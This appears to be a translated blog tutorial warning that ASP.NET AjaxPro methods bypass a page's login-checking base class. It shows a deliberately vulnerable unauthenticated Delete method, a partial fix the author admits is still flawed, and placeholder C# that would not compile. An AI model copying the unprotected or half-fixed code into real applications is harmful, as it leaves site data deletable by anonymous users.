No-refresh AjaxPro easy to ignore vulnerabilities in writing code

It is much more convenient to use AjaxPro to realize the non-refresh function of webpage, and write less javascript, but it is easy to overlook some vulnerabilities when writing code. For example, some operations can only be operated after logging in, but the method called by AjaxPro does not check whether the user is logged in. This is often the case when the management system page of web page has inherited the base class that requires login to access, or the user has been authenticated already logged in, and the AjaxPro method is written under this page and mistakenly believes that the user has been verified that whether the user is logged in does not need to be verified again. The actual situation is not the case. The jurisdiction of the code behind of web page to verify whether the user is logged in does not include the AjaxPro method. In other words, the user can still call the AjaxPro method in the code behind through the javascript in the foreground(aspx or htm) without logging in. This is very dangerous. For example, the AjaxPro method in the code behind is a delete operation. Then users can delete website data without logging in. Is the website still safe?

Examples of no-refresh AjaxPro easy to ignore vulnerabilities in writing code(Code vulnerability examples)

1. The base class to check whether the user logins

All pages that need to login to access inherit this base class. If the user has logined, go to the requested page; if the do not login, then redirect to the login page. code show as below:

public class IsLogin : System.Web.UI.Page
       {
              public IsLogin()
              {
              }

       protected override void OnLoad(EventArgs e)
              {
                     if (HttpContext.Current.Session["user"] == null)
                     {
                            //The user do not login and redirect to the login page
                            HttpContext.Current.Response.Redirect("Login page URL");
                            return;
                     }
                     base.OnLoad(e);
              }
       }

2. AjaxPro realizes delete page without refresh

If you delete a record without refreshing, you must first reference AjaxPro in the code behind and then register; the javascript code in the foreground is as follows:

<script type="text/javascript" language="javascript">
       function del(id) {
              var res = testpro.AjaxProDel.Delete(id).value;
              if (res) {
                     alert("Successfully deleted");
              }
              else {
                     alert("Failed to delete");
              }
       }
       </script>

Code in the code behind:

using AjaxPro;

namespace testpro
       {
              public partial class AjaxProDel : IsLogin//The base class inheritance to check whether to login
              {
                     protected void Page_Load(object sender, EventArgs e)
                     {
                            Utility.RegisterTypeForAjax(typeof(AjaxProDel));//Register AjaxPro
                     }

              [AjaxMethod]
                     public bool Delete(int id)
                     {
                            if (id <= 0) return false;

                     //Write code to delete records from the database
                            if ("Delete record successfully")
                                   return true;
                            else
                                   return false;
                     }
              }
       }

The above code commits the error mentioned at the beginning of article. Although the code behind inherits the "IsLogin" class to check whether to login, the user still calls the Delete(int id) method of the code behind without logging in; the AjaxPro method should ckeck Whether the user logins, the revised code is:

[AjaxMethod(AjaxPro.HttpSessionStateRequirement.Read)]
       public bool Delete(int id)
       {
              if (HttpContext.Current.Session["user"] == null)
                     return false;//The user do not login and returns false, without deleting

       if (id <= 0) return false;

       //Write code to delete records from the database
              if ("Delete record successfully")
                     return true;
              else
                     return false;
       }

There is still a vulnerability in the modified code. I don't know if you have found it. I believe you will find out after some thoughts. If it doesn't work, you will find out after you have written more code, the so-called quantitative change will accumulate to a certain extent and qualitative change will occur.